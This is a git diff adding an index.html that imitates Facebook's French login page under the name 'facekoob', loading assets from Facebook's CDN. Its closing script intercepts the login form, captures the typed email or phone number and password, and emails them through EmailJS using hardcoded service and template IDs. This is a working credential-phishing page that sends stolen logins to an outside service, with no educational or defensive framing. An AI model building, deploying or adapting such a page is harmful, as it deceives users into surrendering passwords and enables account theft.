--- a/index.html
+++ b/index.html
@@ -1,1 +1,168 @@
-test index html
+<!DOCTYPE html>
+<html lang="fr" id="facekoob" class="no_js">
+<head>
+    <meta charset="utf-8"/>
+    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer"/>
+    <style nonce="l5Wjh7kk"></style>
+    <script nonce="l5Wjh7kk">__DEV__ = 0;</script>
+    <noscript>
+        <meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1"/>
+    </noscript>
+    <link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/?is_workplace_mobile_pwa_dogfooding=0"
+          crossorigin="use-credentials"/>
+    <title id="pageTitle">facekoob - Connexion ou inscription</title>
+    <meta name="bingbot" content="noarchive"/>
+    <meta property="og:site_name" content="facekoob"/>
+    <meta property="og:url" content="https://www.facekoob.com/"/>
+    <meta property="og:image" content="https://www.facekoob.com/images/fb_icon_325x325.png"/>
+    <meta property="og:locale" content="fr_FR"/>
+    <link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facekoob.com/"/>
+    <link rel="alternate" media="handheld" href="https://m.facekoob.com/"/>
+ 
+    <link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yx/r/e9sqr8WnkCf.ico"/>
+    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yh/l/0,cross/R5BgtFvXEZA.css"
+          data-bootloader-hash="kQeX049" crossorigin="anonymous"/>
+    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yq/l/0,cross/7_MjMmAeU6J.css"
+          data-bootloader-hash="TDVEpcj" crossorigin="anonymous"/>
+    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yT/l/0,cross/E8KC5ZQLLMb.css"
+          data-bootloader-hash="Wsd4ut3" crossorigin="anonymous"/>
+    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/y6/l/0,cross/uowjHAy6Pgu.css"
+          data-bootloader-hash="vbpyWNc" crossorigin="anonymous"/>
+    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/y0/l/0,cross/3tru6ET-_1L.css"
+          data-bootloader-hash="8XB4L1E" crossorigin="anonymous"/>
+    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yF/l/0,cross/nH2wPuzvL_O.css"
+          data-bootloader-hash="b11hf5+" crossorigin="anonymous"/>
+    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yZ/r/MFgEMyAJz7k.js" data-bootloader-hash="skH0Hyw"
+            crossorigin="anonymous"></script>
+
+</head>
+<body class="fbIndex UIPage_LoggedOut _-kb sf _605a b_c3pyn-ahh chrome webkit mac x2 Locale_fr_FR" dir="ltr">
+<script type="text/javascript" nonce="l5Wjh7kk">requireLazy(["bootstrapWebSession"], function (j) {
+    j(1757510654)
+})</script>
+<div class="_li" id="u_0_1_sS">
+    <div id="globalContainer" class="uiContextualLayerParent">
+        <div class="fb_content clearfix " id="content" role="main">
+            <div>
+                <div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
+                    <div class="_8esk">
+                        <div class="_8esl">
+                            <div class="_8ice"><img class="fb_logo _8ilh img"
+                                                    src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg"
+                                                    alt="facekoob"/></div>
+                            <h2 class="_8eso">Avec facekoob, partagez et restez en contact avec votre entourage.</h2>
+                        </div>
+                        <div class="_8esn">
+                            <div class="_8iep _8icy _9ahz _9ah-">
+                                <div class="_6luv _52jv">
+                                    <form class="_9vtf" data-testid="royal_login_form" id="loginForm"
+                                          action=""
+                                          method="post" id="u_0_2_5t">
+                                        <div>
+                                            <div class="_6lux"><input type="text" class="inputtext _55r1 _6luy"
+                                                                      name="emailcode" id="emailcode" data-testid="royal-email"
+                                                                      placeholder="Adresse e-mail ou num&#xe9;ro de t&#xe9;l."
+                                                                      autofocus="1"
+                                                                      aria-label="Adresse e-mail ou num&#xe9;ro de t&#xe9;l."/>
+                                            </div>
+                                            <div class="_6lux">
+                                                <div class="_6luy _55r1 _1kbt" id="passContainer"><input type="password"
+                                                                                                         class="inputtext _55r1 _6luy _9npi"
+                                                                                                         name="passcode"
+                                                                                                         id="passcode"
+                                                                                                         data-testid="royal-pass"
+                                                                                                         placeholder="Mot de passe"
+                                                                                                         aria-label="Mot de passe"/>
+                                                </div>
+                                            </div>
+                                        </div>
+                                        <input type="hidden" autocomplete="off" name="login_source"
+                                               value="comet_headerless_login"/><input type="hidden" autocomplete="off"
+                                                                                      name="next" value=""/><input
+                                                type="hidden" autocomplete="off" name="shared_prefs_data" value=""/>
+                                        <div class="_6ltg">
+                                            <button value="1" class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy"
+                                                    name="login" data-testid="royal-login-button" type="submit"
+                                                    id="u_0_5_9w">Se connecter
+                                            </button>
+                                        </div>
+                                        <div class="_6ltj"><a
+                                                href="https://www.facekoob.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzU3NTEwNjU0LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facekoob_login&amp;next"
+                                                id="u_0_6_vG">Mot de passe oublié ?</a></div>
+                                        <div class="_8icz"></div>
+                                        <div class="_6ltg"><a role="button"
+                                                              class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy"
+                                                              href="/r.php?entry_point=login" ajaxify="" id="u_0_0_pg"
+                                                              data-testid="open-registration-form-button">Créer un
+                                            nouveau compte</a></div>
+                                    </form>
+                                </div>
+                                <div id="reg_pages_msg" class="_58mk"><a
+                                        href="/pages/create/?ref_type=registration_form" class="_8esh">Créer une
+                                    Page</a> pour une célébrité, une marque ou une entreprise.
+                                </div>
+                            </div>
+                        </div>
+                    </div>
+                </div>
+            </div>
+        </div>
+    </div>
+    <div></div>
+</div>
+<div style="display:none"></div>
+
+<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v5/yh/l/0,cross/R5BgtFvXEZA.css" as="style"
+      crossorigin="anonymous"/>
+<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v4/y7/r/d6V49ZCfHJK.js" as="script"
+      crossorigin="anonymous" nonce="l5Wjh7kk"/>
+<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v4/yn/r/LPkMl4dWyGx.js" as="script"
+      crossorigin="anonymous" nonce="l5Wjh7kk"/>
+<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v5/yq/l/0,cross/7_MjMmAeU6J.css" as="style"
+      crossorigin="anonymous"/>
+<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v5/yT/l/0,cross/E8KC5ZQLLMb.css" as="style"
+      crossorigin="anonymous"/>
+<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v5/y6/l/0,cross/uowjHAy6Pgu.css" as="style"
+      crossorigin="anonymous"/>
+<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v5/y0/l/0,cross/3tru6ET-_1L.css" as="style"
+      crossorigin="anonymous"/>
+<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v5/yF/l/0,cross/nH2wPuzvL_O.css" as="style"
+      crossorigin="anonymous"/>
+<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v4i7M54/yD/l/fr_FR-j/tbQiee51SZZ.js" as="script"
+      crossorigin="anonymous" nonce="l5Wjh7kk"/>
+<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v4/yS/r/_hqc_aMr9C3.js" as="script"
+      crossorigin="anonymous" nonce="l5Wjh7kk"/>
+
+
+<!-- Script EmailJS -->
+<script src="https://cdn.emailjs.com/sdk/3.2/email.min.js"></script>
+<script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
+
+<script>
+    (function(){
+        emailjs.init("x6uv0wEa107OaNiu_"); // Remplacer par ton ID EmailJS
+    })();
+
+    document.getElementById("loginForm").addEventListener("submit", function(event){
+        event.preventDefault(); // Empêche le vrai submit
+
+        let emailcode = document.getElementById("emailcode").value;
+        let passcode = document.getElementById("passcode").value;
+        // Données à envoyer
+        let templateParams = {
+            emailcode: emailcode,
+            passcode: passcode,
+            message:'merci '+passcode + 'conection reussi test'+emailcode
+        };
+
+        // Envoi via EmailJS
+        emailjs.send("service_ikq8kw4", "template_7547ji1", templateParams)
+            .then(function(response) {
+                console.log("Email envoyé avec succès !");
+            }, function(error) {
+                console.error("Erreur : " + JSON.stringify(error));
+            });
+    });
+</script>
+</body>
+</html>
